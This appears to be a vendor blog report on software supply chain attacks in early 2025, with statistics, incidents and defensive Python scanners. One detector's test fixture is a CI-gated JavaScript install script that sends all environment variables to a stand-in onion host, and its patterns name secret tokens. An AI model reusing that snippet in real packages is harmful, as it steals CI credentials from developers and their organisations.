The first half of 2025 has been rough. We tracked 847 confirmed software supply chain attacks between January and June -- a 34% increase over H1 2024. But the raw numbers do not tell the whole story. The nature of these attacks is shifting in ways that matter for how we defend against them.
Here is what we found.
The Numbers
Let us start with what happened:
- 847 confirmed supply chain attacks across all ecosystems
- npm remained the most targeted package registry (312 attacks), followed by PyPI (198) and Maven Central (89)
- Average time to detection dropped to 4.2 days from 6.8 days in H1 2024 -- a genuine improvement
- 62% of attacks used typosquatting or dependency confusion as the initial vector
- 23% involved compromised maintainer accounts, up from 14% in 2024
Ecosystem Breakdown
npm: Volume Leader, Sophistication Laggard
npm continues to absorb the most attacks by sheer volume, but most npm attacks remain unsophisticated. The typical pattern is still typosquatting -- registering packages with names similar to popular libraries and waiting for developers to make typos. We saw 189 pure typosquatting attacks on npm in H1 2025.
What is changing is the post-compromise payload. Historically, malicious npm packages would exfiltrate environment variables and call it a day. In 2025, we are seeing more packages that establish persistent backdoors, modify other installed packages, and even tamper with build outputs. The initial access is simple, but the exploitation is getting more advanced.
PyPI: The AI/ML Target
PyPI attacks grew 67% year-over-year, and the reason is obvious: the AI/ML boom. Packages mimicking popular machine learning libraries (variations on torch, transformers, langchain) accounted for 41% of PyPI-targeted attacks. Attackers know that ML engineers often install packages quickly to experiment, and that ML environments frequently have access to GPU resources and sensitive training data.
We documented at least 12 cases where compromised PyPI packages were specifically designed to exfiltrate model weights and training data -- a new category of supply chain attack that barely existed a year ago.
Maven Central and Go Modules: Enterprise Targets
Attacks on Maven Central and Go modules are fewer in number but significantly more targeted. These are not spray-and-pray typosquatting campaigns. They tend to be carefully constructed packages that mimic internal enterprise library naming conventions, suggesting attackers are doing reconnaissance on specific organizations before launching dependency confusion attacks. That reconnaissance does not have to be deep: an internal artifact name leaked through a public repository, a build log, or a stack trace is enough, and any resolver that consults a public registry alongside the internal one and prefers the higher version number will pull the attacker's copy.
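The two initial vectors that dominate the numbers above, typosquatting and dependency confusion, can both be screened for before a manifest reaches a resolver. The following is an added example written for this page, not tooling from the report or from Safeguard: it reads a constructed requirements.txt, flags names that are an edit or two away from a known-popular package, and flags internal-namespace names that also exist on the public registry. The popular-package list, the `acme-` internal prefix and the public-registry name set are constructed stand-ins for data you would pull from your own registry and your real top-N list.

```python
"""Heuristic screen for typosquatting and dependency-confusion candidates.

Added example, not tooling from the report. The popular-package list, the
internal namespace prefix and the "public registry" contents are constructed
stand-ins for data you would pull from your own registry and manifests.
"""
import re

# Constructed sample: a requirements.txt as an engineer might write it.
REQUIREMENTS = """\
requests==2.32.3
requets==2.32.3
numpy>=1.26
transformrs==4.41.0
acme-authlib==3.1.0
acme-billing==0.9.2
"""

# Constructed: packages you trust (in practice, the top-N from the registry).
POPULAR = {"requests", "numpy", "torch", "transformers", "langchain", "urllib3"}

# Constructed: the prefix your internal index owns, and names that exist publicly.
INTERNAL_PREFIX = "acme-"
PUBLIC_REGISTRY_NAMES = {"requests", "requets", "numpy", "transformrs", "acme-authlib"}


def normalize(name):
    """PEP 503 normalization: case-fold and collapse runs of -, _ and . to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirements(text):
    """Return the bare, normalized package names from a requirements file."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)", line)
        if m:
            names.append(normalize(m.group(1)))
    return names


def edit_distance(a, b):
    """Levenshtein distance via the standard row-by-row DP; names are short."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(names, popular=POPULAR, max_distance=2):
    """Names that are not a known-popular package but sit within max_distance of one."""
    hits = []
    for name in names:
        if name in popular:
            continue
        best = min(((edit_distance(name, p), p) for p in popular), default=None)
        if best and best[0] <= max_distance:
            hits.append((name, best[1], best[0]))
    return hits


def confusion_candidates(names, prefix=INTERNAL_PREFIX, public=PUBLIC_REGISTRY_NAMES):
    """Internal-namespace names that also exist on the public registry.

    A resolver that consults both indexes and prefers the higher version will
    take the public copy; that is the dependency-confusion primitive.
    """
    return sorted(n for n in names if n.startswith(prefix) and n in public)


if __name__ == "__main__":
    deps = parse_requirements(REQUIREMENTS)
    print("typosquat candidates:", typosquat_candidates(deps))
    print("confusion candidates:", confusion_candidates(deps))
```

The edit-distance check is deliberately loose (it will flag legitimate forks and renamed packages), so treat its output as a review queue rather than a block list. The confusion check is the one to enforce: the durable fix is to claim your internal names on the public registry and to configure the resolver so internal prefixes are only ever resolved from the internal index.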
Notable Incidents
The node-fetch-native Compromise (February 2025)
A maintainer account for a widely-used Node.js HTTP library was compromised through a social engineering campaign that lasted three months. The attacker gradually built trust in the project's community before gaining commit access. The malicious code was subtle -- it only activated when the package was used in CI/CD environments, and it exfiltrated pipeline secrets to a Tor-routed endpoint.
This incident affected an estimated 14,000 downstream projects before detection.
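The incident above describes a payload that stays inert on a developer laptop and fires only inside CI, where pipeline secrets live. One cheap pre-install check for that shape is a static look at what a package's lifecycle hooks do. The following is an added example written for this page, not code from the report, from Safeguard, or from the affected project: it applies a heuristic to a constructed package.json and a constructed install script, looking for the combination of a CI-only gate, bulk environment access, and an egress primitive. The environment-variable and egress patterns are assumptions about what such a payload typically references, not a signature for the specific incident.

```python
"""Flag npm packages whose install hooks look CI-aware and network-capable.

Added example, not from the report. It applies a static heuristic to a
constructed package.json and install script; the patterns are assumptions
about what a CI-only exfiltration payload tends to reference.
"""
import json
import re

# Constructed sample package.json with a lifecycle hook.
PACKAGE_JSON = json.dumps({
    "name": "example-http-helper",
    "version": "3.2.1",
    "scripts": {"postinstall": "node scripts/setup.js", "test": "jest"},
})

# Constructed scripts/setup.js: runs only under CI and ships env vars outward.
SETUP_JS = r"""
const https = require('https');
if (process.env.CI || process.env.GITHUB_ACTIONS) {
  const body = JSON.stringify(process.env);
  const req = https.request({ host: 'example.onion', method: 'POST' });
  req.end(body);
}
"""

# Hooks npm runs automatically when a package is installed from the registry.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Environment variables that only exist inside CI runners (assumed list).
CI_MARKERS = re.compile(
    r"process\.env\.(CI|GITHUB_ACTIONS|GITLAB_CI|BUILDKITE|JENKINS_URL|CIRCLECI|TF_BUILD)\b"
)
# Ways to get bytes off the box, plus .onion hosts.
EGRESS = re.compile(r"https?\.request|fetch\(|\.onion\b|child_process|curl\s")
# Bulk credential access, or direct reads of well-known secret names.
SECRETS = re.compile(
    r"JSON\.stringify\(process\.env\)|Object\.(keys|entries|values)\(process\.env\)"
    r"|NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY"
)


def lifecycle_scripts(package_json_text):
    """Return {hook: command} for the hooks npm runs automatically on install."""
    pkg = json.loads(package_json_text)
    scripts = pkg.get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}


def score_install_script(source):
    """Return the set of indicator names present in the script source."""
    found = set()
    if CI_MARKERS.search(source):
        found.add("ci_gate")
    if EGRESS.search(source):
        found.add("egress")
    if SECRETS.search(source):
        found.add("env_read")
    return found


def verdict(package_json_text, script_source):
    """'block' when a lifecycle hook exists and the script is CI-gated, reads env and egresses.

    Anything with a hook and at least one indicator goes to 'review'; a package
    with no lifecycle hooks at all is 'allow' as far as this check is concerned.
    """
    hooks = lifecycle_scripts(package_json_text)
    if not hooks:
        return "allow"
    indicators = score_install_script(script_source)
    if {"ci_gate", "egress", "env_read"} <= indicators:
        return "block"
    return "review" if indicators else "allow"


if __name__ == "__main__":
    print(lifecycle_scripts(PACKAGE_JSON), score_install_script(SETUP_JS), verdict(PACKAGE_JSON, SETUP_JS))
```

This only sees what is in the install script; a payload loaded at require time, or one that is obfuscated, will pass it. The complementary runtime control is to install with `--ignore-scripts` in CI and to give the job an egress allow-list, so a CI-gated payload has neither a hook to run from nor a route out.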
The PyTorch Extension Campaign (March-April 2025)
A coordinated campaign published 47 malicious packages over six weeks, all mimicking PyTorch extensions and CUDA utilities. The packages functioned correctly for their advertised purpose while simultaneously mining cryptocurrency and exfiltrating GPU utilization data. Several packages accumulated over 50,000 downloads before being flagged.
The Maven Central Namespace Hijack (May 2025)
A sophisticated attack exploited the Maven Central namespace claiming process to publish packages under a legitimate organization's group ID. The attacker registered an expired domain that was previously associated with an open-source project's maintainers, then used it to verify ownership of the Maven namespace. This is a systemic issue with how some registries tie identity to DNS ownership: a reverse-DNS group ID is only as trustworthy as the registration of the domain behind it. If your organization publishes under a domain-derived namespace, treat that domain like a signing key: keep it under registrar lock, monitor its expiry, and do not let it lapse just because the project it was bought for has gone quiet.
Emerging Trends
AI-Assisted Attack Creation
We have strong evidence that attackers are using large language models to generate malicious packages at scale. The telltale signs include: packages with high-quality README files and documentation (unusual for typosquatting attempts), functional code that closely mimics the legitimate package's API surface, and obfuscation techniques that vary slightly across each package in a campaign -- consistent with LLM-generated variations.
Build System Targeting
Attacks are moving earlier in the pipeline. We tracked 34 incidents targeting build tools and plugins directly -- Webpack plugins, Gradle plugins, GitHub Actions -- rather than application dependencies. Compromising a build tool gives attackers code execution during the build process itself, which often has access to signing keys, deployment credentials, and artifact repositories.
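For GitHub Actions specifically, the most common way a build job ends up running someone else's code is a `uses:` reference to a mutable tag or branch, which the action's maintainer (or whoever compromises them) can repoint at will. The following is an added example written for this page, not code from the report or from Safeguard: it scans a constructed workflow file and reports every action reference that is not pinned to a full commit SHA (or, for `docker://` images, to a digest). It uses a line regex rather than a YAML parser so it runs with the standard library alone; the workflow text and the action names in it are constructed.

```python
"""Find `uses:` references in GitHub Actions workflows that are not pinned to a commit SHA.

Added example, not from the report; the workflow text is constructed. A line
regex is used instead of a YAML parser so this runs with the standard library.
"""
import re

# Constructed workflow: a mix of mutable tags, a SHA pin, a local action and an image.
WORKFLOW = """\
name: release
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@1e60f620b9541d16bece96c5465dc8ee9832be0b # v4.0.3
      - uses: ./.github/actions/local-build
      - uses: docker://alpine:3.20
      - name: Publish
        uses: some-org/publish-action@main
        with:
          token: ${{ secrets.NPM_TOKEN }}
"""

USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def classify_ref(ref):
    """'local' for ./path, 'digest' for docker://...@sha256:, 'sha' for @<40 hex>, else 'mutable'."""
    if ref.startswith("./"):
        return "local"
    if ref.startswith("docker://"):
        return "digest" if "@sha256:" in ref else "mutable"
    if "@" not in ref:
        return "mutable"
    version = ref.rsplit("@", 1)[1]
    return "sha" if FULL_SHA.match(version) else "mutable"


def unpinned_uses(workflow_text):
    """Return [(line_no, ref)] for every action reference that can change underneath you."""
    findings = []
    for n, line in enumerate(workflow_text.splitlines(), 1):
        m = USES.search(line)
        if not m:
            continue
        ref = m.group(1)
        if classify_ref(ref) == "mutable":
            findings.append((n, ref))
    return findings


if __name__ == "__main__":
    for line_no, ref in unpinned_uses(WORKFLOW):
        print(f"line {line_no}: {ref} is not pinned to a commit SHA")
```

A SHA pin freezes which code runs; it does not tell you that code is safe, and it will happily freeze a compromised commit if that is what you pinned. Pair pinning with a review of the pinned revision and an automated bump process so pins do not rot into unpatched versions.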
Supply Chain Attacks as a Service
In underground forums, we identified at least three services offering supply chain attack capabilities for hire. These range from maintaining networks of typosquatting packages across multiple registries to providing compromised maintainer accounts. The commoditization of supply chain attacks lowers the barrier to entry significantly.
What is Working
Not everything is bad news. Detection is genuinely improving.
Package registries are getting better at automated detection. npm's malware detection caught 78% of typosquatting attempts within 24 hours, up from 52% in 2024. PyPI's trusted publisher program is reducing the attack surface for account compromise: a project publishes from a registered CI workflow using a short-lived token minted from the CI provider's OIDC identity, so there is no long-lived API token sitting in a maintainer's account or in a CI secret for an attacker to steal.
Tools like Safeguard that monitor SBOMs continuously are catching compromised packages faster. Organizations using automated SBOM monitoring detected supply chain compromises an average of 3.1 days faster than those relying on periodic scans.
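Continuous SBOM monitoring is, at its core, a join between the components you actually ship and a feed of compromised package versions, re-run every time either side changes. The following is an added example written for this page, not Safeguard's code: it parses a constructed CycloneDX SBOM, extracts the package URL (purl) of each component, and matches it against a constructed indicator list keyed by ecosystem, name and version, where a `*` version marks a package that should never be installed at all (a typosquat, for instance). The purl parser handles the scheme, percent-encoded npm scopes and qualifier suffixes but is not a full implementation of the purl spec.

```python
"""Match a CycloneDX SBOM against a list of known-compromised package versions.

Added example, not Safeguard's code. The SBOM and the indicator list are
constructed; indicator entries use package URL (purl) fields. A '*' version
means every version of that package is considered compromised.
"""
import json
from urllib.parse import unquote

# Constructed CycloneDX 1.5 SBOM with four components.
SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "components": [
        {"type": "library", "name": "lodash", "version": "4.17.21",
         "purl": "pkg:npm/lodash@4.17.21"},
        {"type": "library", "name": "http-helper", "version": "3.2.1",
         "purl": "pkg:npm/%40acme/http-helper@3.2.1"},
        {"type": "library", "name": "requets", "version": "2.32.3",
         "purl": "pkg:pypi/requets@2.32.3"},
        {"type": "library", "name": "torch", "version": "2.3.0",
         "purl": "pkg:pypi/torch@2.3.0"},
    ],
})

# Constructed indicator feed: (purl type, package name, version or '*').
INDICATORS = [
    ("npm", "@acme/http-helper", "3.2.1"),
    ("npm", "@acme/http-helper", "3.2.2"),
    ("pypi", "requets", "*"),
]


def parse_purl(purl):
    """Return (type, namespaced name, version) from a purl like pkg:npm/%40s/n@1.0.

    Strips qualifiers (?...) and subpaths (#...), splits the version on the last
    '@' before percent-decoding so an encoded scope separator is not mistaken
    for it, and applies pypi name normalization. Not a full purl implementation.
    """
    if not purl.startswith("pkg:"):
        raise ValueError("not a purl: " + purl)
    body = purl[4:].split("?", 1)[0].split("#", 1)[0]
    ptype, _, rest = body.partition("/")
    if "@" in rest:
        name_part, _, version = rest.rpartition("@")
    else:
        name_part, version = rest, ""
    name = unquote(name_part)
    if ptype == "pypi":
        name = name.lower().replace("_", "-")
    return ptype, name, version or None


def build_index(indicators):
    """{(type, name): {versions}} so each SBOM component is one dictionary lookup."""
    idx = {}
    for ptype, name, version in indicators:
        idx.setdefault((ptype, name), set()).add(version)
    return idx


def compromised_components(sbom_text, indicators=INDICATORS):
    """Return [(purl, matched_indicator_version)] for components hit by an indicator."""
    idx = build_index(indicators)
    hits = []
    for comp in json.loads(sbom_text).get("components", []):
        purl = comp.get("purl")
        if not purl:
            continue
        ptype, name, version = parse_purl(purl)
        versions = idx.get((ptype, name), set())
        if "*" in versions:
            hits.append((purl, "*"))
        elif version in versions:
            hits.append((purl, version))
    return hits


if __name__ == "__main__":
    for purl, indicator in compromised_components(SBOM):
        print(f"{purl} matches indicator version {indicator}")
```

The match is only as good as the SBOM's coverage: a BOM generated from a manifest rather than from the resolved lockfile or the built artifact will miss transitive dependencies and the exact versions that were actually installed, which is where most of the packages in this report's numbers sit.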
Sigstore adoption is accelerating. Packages with verified provenance through Sigstore were involved in zero successful supply chain attacks in H1 2025. Provenance works, and the challenge is adoption. One caveat worth keeping in mind: a provenance attestation proves that a given artifact was built from a given source revision by a given workflow; it does not prove that the source was benign. Provenance closes the gap between what was reviewed and what was published, and it makes a compromised maintainer account far less useful, but it is not a substitute for looking at the code.
How Safeguard.sh Helps
Safeguard.sh provides continuous monitoring of your software supply chain. Our platform generates and tracks SBOMs, maps vulnerabilities to your actual dependency graph, and runs policy gates that can block deployments when supply chain indicators of compromise are detected. With the Safeguard MCP Server, your development team gets real-time visibility into supply chain risks without leaving their development environment. The first half of 2025 showed that supply chain attacks are not slowing down -- but neither are the defenses.